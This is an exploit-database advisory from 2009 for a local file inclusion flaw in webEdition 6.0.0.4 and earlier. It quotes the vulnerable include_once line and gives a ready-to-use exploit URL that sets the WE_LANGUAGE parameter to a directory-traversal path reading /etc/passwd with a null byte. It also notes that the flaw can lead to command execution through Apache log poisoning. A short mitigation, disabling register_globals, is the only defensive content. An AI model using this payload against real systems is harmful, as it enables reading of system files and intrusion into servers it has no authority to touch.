header-logo
Suggest Exploit
vendor:
webedition
by:
Salvatore "drosophila" Fresta
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: webedition
Affected Version From: 6.0.0.4
Affected Version To: 6.0.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:webedition:webedition:6.0.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

webEdition <= 6.0.0.4 Local File Inclusion

This bug allows a guest to include local files. This tecnique can be used to exec remote commands on the vulnerable system using Apache logs.

Mitigation:

Disable register_globals
Source

Exploit-DB raw data:

*******   Salvatore "drosophila" Fresta   *******

[+] Application: webEdition
[+] Version: <= 6.0.0.4
[+] Website: http://www.webedition.de

[+] Bugs: [A] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 31 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Local File Inclusion

[-] Requisites: register_globals = on

This bug allows a guest to include local files.
This tecnique can be used to exec remote commands
on the vulnerable system using Apache logs.

...

include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");

...


*************************************************

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/index.php?WE_LANGUAGE=../../../../../../../../etc/passwd%00

# milw0rm.com [2009-03-31]